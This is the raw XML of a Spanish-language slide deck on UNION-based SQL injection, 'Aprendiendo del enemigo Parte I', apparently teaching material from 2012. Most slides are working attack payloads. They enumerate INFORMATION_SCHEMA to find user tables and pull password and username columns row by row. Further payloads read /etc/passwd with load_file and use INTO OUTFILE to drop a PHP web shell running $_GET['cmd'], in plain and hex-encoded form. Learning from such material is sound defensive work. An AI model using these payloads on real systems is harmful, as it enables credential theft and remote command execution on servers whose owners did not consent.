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21/07/12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sql.php?db=information_schema&amp;table=TABLES&amp;sql_query=SELECT+*+FROM+%60TABLES%60+ORDER+BY+%60TABLES%60.%60TABLE_NAME%60+ASC&amp;session_max_rows=30&amp;token=ae83a033b2bc4ad28e9672005884932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phpmyadmin/sql.php?db=information_schema&amp;table=TABLES&amp;sql_query=SELECT+*+FROM+%60TABLES%60+ORDER+BY+%60TABLES%60.%60TABLE_SCHEMA%60+ASC&amp;session_max_rows=30&amp;token=ae83a033b2bc4ad28e9672005884932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sql.php?db=information_schema&amp;table=TABLES&amp;sql_query=SELECT+*+FROM+%60TABLES%60+ORDER+BY+%60TABLES%60.%60TABLE_NAME%60+ASC&amp;session_max_rows=30&amp;token=ae83a033b2bc4ad28e9672005884932d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phpmyadmin/sql.php?db=information_schema&amp;table=TABLES&amp;sql_query=SELECT+*+FROM+%60TABLES%60+ORDER+BY+%60TABLES%60.%60TABLE_SCHEMA%60+ASC&amp;session_max_rows=30&amp;token=ae83a033b2bc4ad28e9672005884932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o.com/login" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dominio.com/identificarse" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dominio.com/panel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minio.com/adm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(SQL Injection)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Aprendiendo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>enemigo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Parte I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hdstryowrld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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Captura de pantalla 2012-07-21 a la(s) 05.38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0" b="955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Buscando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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select 1, 2 FROM INFORMATION_SCHEMA.TABLES WHERE TABLES.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="Ordenar"/>
              </a:rPr>
              <a:t> TABLE_SCHEMA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nombre_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Ordenar"/>
              </a:rPr>
              <a:t>TABLE_NAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=‘%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usuarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%’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1, 2 FROM INFORMATION_SCHEMA.TABLES WHERE TABLES.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="Ordenar"/>
              </a:rPr>
              <a:t> TABLE_SCHEMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nombre_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Ordenar"/>
              </a:rPr>
              <a:t>TABLE_NAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%users%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’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1, 2 FROM INFORMATION_SCHEMA.TABLES WHERE TABLES.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="Ordenar"/>
              </a:rPr>
              <a:t> TABLE_SCHEMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nombre_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Ordenar"/>
              </a:rPr>
              <a:t>TABLE_NAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%members%’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9522" y="6331538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16" y="5297298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Averiguando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1, 2 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INFORMATION_SCHEMA.COLUMNS </a:t>
            </a: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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COLUMNS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2" tooltip="Ordenar"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="Ordenar"/>
              </a:rPr>
              <a:t>TABLE_SCHEMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nombre_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Ordenar"/>
              </a:rPr>
              <a:t>TABLE_NAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tabla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’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1, 2 FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMNS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="Ordenar"/>
              </a:rPr>
              <a:t> TABLE_SCHEMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nombre_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Ordenar"/>
              </a:rPr>
              <a:t>TABLE_NAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tabla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ limit 1, 1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1, 2 FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMNS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2" tooltip="Ordenar"/>
              </a:rPr>
              <a:t> TABLE_SCHEMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nombre_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Ordenar"/>
              </a:rPr>
              <a:t>TABLE_NAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tabla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ limit 2,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8861" y="638756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55" y="535332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Obteniendo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>contraseñas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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>campoPassword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2 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>baseDatos.tablaUsuarios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limit 1,1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>campoPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 2 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>baseDatos.tablaUsuarios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limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2,1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>campoPassword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campoNombreUsuario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FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>baseDatos.tablaUsuarios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limit 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,1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forma de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>identificarse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http://dominio.com/admin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dominio.com/login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http://dominio.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/identificarse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http://dominio.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/panel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8794" y="5920642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4886402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en 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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 7" descr="Captura de pantalla 2012-07-21 a la(s) 05.51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3" r="20823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6795549" y="6488668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43" y="5454428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Escribir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fichero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SELECT campo1, campo2 FROM tabla WHERE id = 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO OUTFILE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ruta_server/1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0"/>
              <a:t>SELECT campo1, campo2 FROM tabla WHERE id = 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘&lt;?php echo ”hola” ?&gt;’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO OUTFILE ’ruta_server/1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php’</a:t>
            </a:r>
          </a:p>
          <a:p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/>
              <a:t>SELECT campo1, campo2 FROM tabla WHERE id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select 1, 2,3,0x3c3f706870206563686f2022486f6c61223b203f3e INTO OUTFILE '/usr/local/apache2/htdocs/cursos/htdocs/cursos/challenge/0/2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>home.paulschou.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/tools/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xlate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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6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Leer un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fichero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SELECT campo1, campo2 FROM tabla WHERE id=-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select 1, load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(‘ruta_server/fichero'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0"/>
              <a:t>SELECT campo1, campo2 FROM tabla WHERE id=-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select 1, load_file(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘/etc/passwd'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),3, 4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shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>remota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solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1, 2,3,'&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> echo `{$_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"]}` ?&gt;' INTO OUTFILE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ruta_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1, 2,3,'&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SYSTEM($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_GET["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”]) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt;' INTO OUTFILE ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ruta_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'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s-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2,3,0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3c3f706870206563686f20607b245f4745545b22636d64225d7d60203f3e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO OUTFILE ’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ruta_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1, 2,3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
